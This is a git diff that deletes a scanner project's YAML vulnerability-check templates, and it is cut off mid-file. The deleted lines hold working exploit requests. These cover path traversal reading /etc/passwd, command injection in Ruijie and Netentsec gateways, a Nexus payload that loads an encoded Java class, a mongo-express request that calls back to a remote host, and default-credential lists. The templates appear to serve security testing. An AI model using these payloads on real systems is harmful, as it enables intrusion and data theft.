http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871 \ No newline at end of file diff --git a/WebScan/pocs/jboss-unauth.yml b/WebScan/pocs/jboss-unauth.yml deleted file mode 100644 index 5fbe218..0000000 --- a/WebScan/pocs/jboss-unauth.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-jboss-unauth -rules: - - method: GET - path: /jmx-console/ - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://xz.aliyun.com/t/6103 \ No newline at end of file diff --git a/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml b/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml deleted file mode 100644 index 1eb3e2b..0000000 --- a/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-jenkins-cve-2018-1000861-rce -set: - rand: randomLowercase(4) -rules: - - method: GET - path: >- - /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload; - follow_redirects: false - expression: >- - response.status == 200 && response.body.bcontains(bytes("package#" + rand)) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 diff --git a/WebScan/pocs/jenkins-unauthorized-access.yml b/WebScan/pocs/jenkins-unauthorized-access.yml deleted file mode 100644 index dabe88b..0000000 --- a/WebScan/pocs/jenkins-unauthorized-access.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-jenkins-unauthorized-access -set: - r1: randomInt(1000, 9999) - r2: randomInt(1000, 9999) -rules: - - method: GET - path: /script - follow_redirects: false - expression: response.status == 200 - search: | - "Jenkins-Crumb", "(?P.+?)"\); - - method: POST - path: /script - body: | - script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C - expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2))) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://www.cnblogs.com/yuzly/p/11255609.html - - https://blog.51cto.com/13770310/2156663 diff --git a/WebScan/pocs/jumpserver-unauth-rce.yml b/WebScan/pocs/jumpserver-unauth-rce.yml deleted file mode 100644 index 041832d..0000000 --- a/WebScan/pocs/jumpserver-unauth-rce.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-jumpserver-unauth-rce -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /api/v1/authentication/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/authentication/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") -detail: - author: mvhz81 - info: jumpserver unauth read logfile + jumpserver rce - links: - - https://s.tencent.com/research/bsafe/1228.html - - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw - - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/jumpserver-unauth-rce2.yml b/WebScan/pocs/jumpserver-unauth-rce2.yml deleted file mode 100644 index 353329d..0000000 --- a/WebScan/pocs/jumpserver-unauth-rce2.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-jumpserver-unauth-rce -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /api/v1/users/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/users/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") -detail: - author: mvhz81 - info: jumpserver unauth read logfile + jumpserver rce - links: - - https://s.tencent.com/research/bsafe/1228.html - - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw - - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/kingsoft-v8-default-password.yml b/WebScan/pocs/kingsoft-v8-default-password.yml deleted file mode 100644 index 6835390..0000000 --- a/WebScan/pocs/kingsoft-v8-default-password.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-kingsoft-v8-default-password -rules: - - method: POST - path: /inter/ajax.php?cmd=get_user_login_cmd - body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}" - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://idc.wanyunshuju.com/aqld/2123.html \ No newline at end of file diff --git a/WebScan/pocs/kingsoft-v8-file-read.yml b/WebScan/pocs/kingsoft-v8-file-read.yml deleted file mode 100644 index 02b3eb0..0000000 --- a/WebScan/pocs/kingsoft-v8-file-read.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-kingsoft-v8-file-read -rules: - - method: GET - path: >- - /htmltopdf/downfile.php?filename=/windows/win.ini - follow_redirects: false - expression: | - response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml deleted file mode 100644 index f7d39e7..0000000 --- a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-landray-oa-custom-jsp-fileread -rules: - - method: POST - path: /sys/ui/extend/varkind/custom.jsp - body: var={"body":{"file":"file:///c://windows/win.ini"}} - expression: | - response.status == 200 && response.body.bcontains(b"for 16-bit app support") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw \ No newline at end of file diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread.yml deleted file mode 100644 index e513a88..0000000 --- a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-landray-oa-custom-jsp-fileread -rules: - - method: POST - path: /sys/ui/extend/varkind/custom.jsp - body: var={"body":{"file":"file:///etc/passwd"}} - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw \ No newline at end of file diff --git a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml b/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml deleted file mode 100644 index b4c8a72..0000000 --- a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-lanproxy-cve-2021-3019-lfi -rules: - - method: GET - path: "/../conf/config.properties" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") -detail: - author: pa55w0rd(www.pa55w0rd.online/) - Affected Version: "lanproxy 0.1" - links: - - https://github.com/ffay/lanproxy/issues/152 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 diff --git a/WebScan/pocs/laravel-debug-info-leak.yml b/WebScan/pocs/laravel-debug-info-leak.yml deleted file mode 100644 index aa5610e..0000000 --- a/WebScan/pocs/laravel-debug-info-leak.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-laravel-debug-info-leak -rules: - - method: POST - path: / - follow_redirects: false - expression: > - response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) -detail: - author: Dem0ns (https://github.com/dem0ns) - links: - - https://github.com/dem0ns/improper/tree/master/laravel/5_debug diff --git a/WebScan/pocs/laravel-improper-webdir.yml b/WebScan/pocs/laravel-improper-webdir.yml deleted file mode 100644 index d1db0b5..0000000 --- a/WebScan/pocs/laravel-improper-webdir.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-laravel-improper-webdir -rules: - - method: GET - path: /storage/logs/laravel.log - follow_redirects: false - expression: > - response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) -detail: - author: Dem0ns (https://github.com/dem0ns) - links: - - https://github.com/dem0ns/improper diff --git a/WebScan/pocs/mongo-express-cve-2019-10758.yml b/WebScan/pocs/mongo-express-cve-2019-10758.yml deleted file mode 100644 index 6d64293..0000000 --- a/WebScan/pocs/mongo-express-cve-2019-10758.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-mongo-express-cve-2019-10758 -set: - reverse: newReverse() - reverseURL: reverse.url -rules: - - method: POST - path: /checkValid - headers: - Authorization: Basic YWRtaW46cGFzcw== - body: >- - document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') - follow_redirects: true - expression: > - reverse.wait(5) -detail: - vulnpath: '/checkValid' - author: fnmsd(https://github.com/fnmsd) - description: 'Mongo Express CVE-2019-10758 Code Execution' - links: - - https://github.com/masahiro331/CVE-2019-10758 - - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html \ No newline at end of file diff --git a/WebScan/pocs/netentsec-ngfw-rce.yml b/WebScan/pocs/netentsec-ngfw-rce.yml deleted file mode 100644 index bff8b28..0000000 --- a/WebScan/pocs/netentsec-ngfw-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-netentsec-ngfw-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - r3: randomInt(800000000, 1000000000) - r4: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /directdata/direct/router - body: >- - {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="} - expression: response.status == 200 - - method: GET - path: /{{r2}} - expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/nexus-cve-2019-7238.yml b/WebScan/pocs/nexus-cve-2019-7238.yml deleted file mode 100644 index 69d5bc4..0000000 --- a/WebScan/pocs/nexus-cve-2019-7238.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-nexus-cve-2019-7238 -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: "/service/extdirect" - headers: - Content-Type: application/json - body: | - {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'expr {{r1}} + {{r2}}');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) -detail: - Affected Version: "nexus<3.15" - author: hanxiansheng26(https://github.com/hanxiansheng26) - links: - - https://github.com/jas502n/CVE-2019-7238 - - https://github.com/verctor/nexus_rce_CVE-2019-7238 - - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2019-7238 diff --git a/WebScan/pocs/nexus-cve-2020-10199.yml b/WebScan/pocs/nexus-cve-2020-10199.yml deleted file mode 100644 index 7ce9fa7..0000000 --- a/WebScan/pocs/nexus-cve-2020-10199.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-nexus-cve-2020-10199 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: "/rest/beta/repositories/go/group" - headers: - Content-Type: application/json - body: | - {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}} - expression: | - response.status == 400 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "nexus<3.21.2" - author: kingkk(https://www.kingkk.com/) - links: - - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb - - https://www.cnblogs.com/magic-zero/p/12641068.html - - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype - - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-cve-2020-10204.yml b/WebScan/pocs/nexus-cve-2020-10204.yml deleted file mode 100644 index a08a2bb..0000000 --- a/WebScan/pocs/nexus-cve-2020-10204.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-nexus-cve-2020-10204 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: "/extdirect" - headers: - Content-Type: application/json - body: | - {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28} - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "nexus<3.21.2" - author: kingkk(https://www.kingkk.com/) - links: - - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb - - https://www.cnblogs.com/magic-zero/p/12641068.html - - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-default-password.yml b/WebScan/pocs/nexus-default-password.yml deleted file mode 100644 index 5a27c24..0000000 --- a/WebScan/pocs/nexus-default-password.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-nexus-default-password -rules: - - method: GET - path: /nexus/service/siesta/capabilities - expression: > - response.status == 401 - - method: GET - path: /nexus/service/local/authentication/login - headers: - Accept: application/json - Authorization: Basic YWRtaW46YWRtaW4xMjM= - expression: > - response.status == 200 - - method: GET - path: /nexus/service/siesta/capabilities - expression: > - response.status == 200 -detail: - author: Soveless(https://github.com/Soveless) - Affected Version: "Nexus Repository Manager OSS" - links: - - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager \ No newline at end of file diff --git a/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml b/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml deleted file mode 100644 index 20a73c0..0000000 --- a/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion -rules: - - method: GET - path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd - follow_redirects: false - expression: >- - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 diff --git a/WebScan/pocs/phpmyadmin-setup-deserialization.yml b/WebScan/pocs/phpmyadmin-setup-deserialization.yml deleted file mode 100644 index 7bf691e..0000000 --- a/WebScan/pocs/phpmyadmin-setup-deserialization.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-phpmyadmin-setup-deserialization -rules: - - method: POST - path: /scripts/setup.php - body: >- - action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} - follow_redirects: false - expression: >- - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: p0wd3r - links: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 diff --git a/WebScan/pocs/phpstudy-backdoor-rce.yml b/WebScan/pocs/phpstudy-backdoor-rce.yml deleted file mode 100644 index a8bb748..0000000 --- a/WebScan/pocs/phpstudy-backdoor-rce.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-phpstudy-backdoor-rce -set: - r: randomLowercase(6) - payload: base64("printf(md5('" + r + "'));") -rules: - - method: GET - path: /index.php - headers: - Accept-Encoding: 'gzip,deflate' - Accept-Charset: '{{payload}}' - follow_redirects: false - expression: | - response.body.bcontains(bytes(md5(r))) -detail: - author: 17bdw - Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" - vuln_url: "php_xmlrpc.dll" - links: - - https://www.freebuf.com/column/214946.html \ No newline at end of file diff --git a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml b/WebScan/pocs/poc-yaml-weblogic-console-weak.yml deleted file mode 100644 index 99b5151..0000000 --- a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml +++ /dev/null @@ -1,29 +0,0 @@ -name: poc-yaml-weblogic-console-weak -sets: - username: - - weblogic - password: - - weblogic - - weblogic1 - - welcome1 - - Oracle@123 - - weblogic123 - payload: - - UTF-8 -rules: - - method: HEAD - path: /console/j_security_check - follow_redirects: false - expression: | - response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION") - - method: POST - path: /console/j_security_check - follow_redirects: false - headers: - Content-type: application/x-www-form-urlencoded - body: | - j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}} - expression: | - !response.body.bcontains(b"LoginForm.jsp") -detail: - author: shadown1ng(https://github.com/shadown1ng) \ No newline at end of file diff --git a/WebScan/pocs/pocs.zip b/WebScan/pocs/pocs.zip new file mode 100644 index 0000000..9e8a1be Binary files /dev/null and b/WebScan/pocs/pocs.zip differ diff --git a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml b/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml deleted file mode 100644 index 9bc1287..0000000 --- a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-qizhi-fortressaircraft-unauthorized - -rules: - - method: GET - path: >- - /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm - expression: | - response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计") -detail: - author: we1x4n(https://we1x4n.com/) - links: - - https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw \ No newline at end of file diff --git a/WebScan/pocs/rockmongo-default-password.yml b/WebScan/pocs/rockmongo-default-password.yml deleted file mode 100644 index c0b3566..0000000 --- a/WebScan/pocs/rockmongo-default-password.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-rockmongo-default-password -rules: - - method: POST - path: /index.php?action=login.index&host=0 - body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3 - follow_redirects: false - expression: | - response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0" -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://www.runoob.com/mongodb/working-with-rockmongo.html \ No newline at end of file diff --git a/WebScan/pocs/ruijie-eg-info-leak.yml b/WebScan/pocs/ruijie-eg-info-leak.yml deleted file mode 100644 index 1150806..0000000 --- a/WebScan/pocs/ruijie-eg-info-leak.yml +++ /dev/null @@ -1,24 +0,0 @@ -name: poc-yaml-ruijie-eg-info-leak -rules: - - method: POST - path: /login.php - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username=admin&password=admin?show+webmaster+user - expression: "true" - search: | - {"data":".*?(?P\w+)\s?(?P\w+)","status":1} - - method: POST - path: /login.php - headers: - Content-Type: application/x-www-form-urlencoded - body: | - username={{username}}&password={{password}} - expression: | - response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}") -detail: - author: Search?=Null - description: "Ruijie EG网关信息泄漏" - links: - - https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ \ No newline at end of file diff --git a/WebScan/pocs/ruijie-eg-rce.yml b/WebScan/pocs/ruijie-eg-rce.yml deleted file mode 100644 index 2aac600..0000000 --- a/WebScan/pocs/ruijie-eg-rce.yml +++ /dev/null @@ -1,29 +0,0 @@ -name: poc-yaml-ruijie-eg-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - phpcode: > - "" - payload: base64(phpcode) -rules: - - method: POST - path: "/guest_auth/guestIsUp.php" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" - Accept-Encoding: "gzip, deflate" - Content-Type: "application/x-www-form-urlencoded; charset=UTF-8" - body: | - ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00 - expression: | - response.status == 200 - - method: GET - path: "/guest_auth/{{r2}}.php" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" - Accept-Encoding: "gzip, deflate" - expression: | - response.body.bcontains(bytes(r1)) -detail: - author: White(https://github.com/WhiteHSBG) - links: - - https://xz.aliyun.com/t/9016?page=1 \ No newline at end of file diff --git a/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml b/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml deleted file mode 100644 index e3a3d68..0000000 --- a/WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-ruijie-nbr1300g-cli-password-leak -rules: - - method: POST - path: /WEB_VMS/LEVEL15/ - follow_redirects: false - headers: - Authorization: Basic 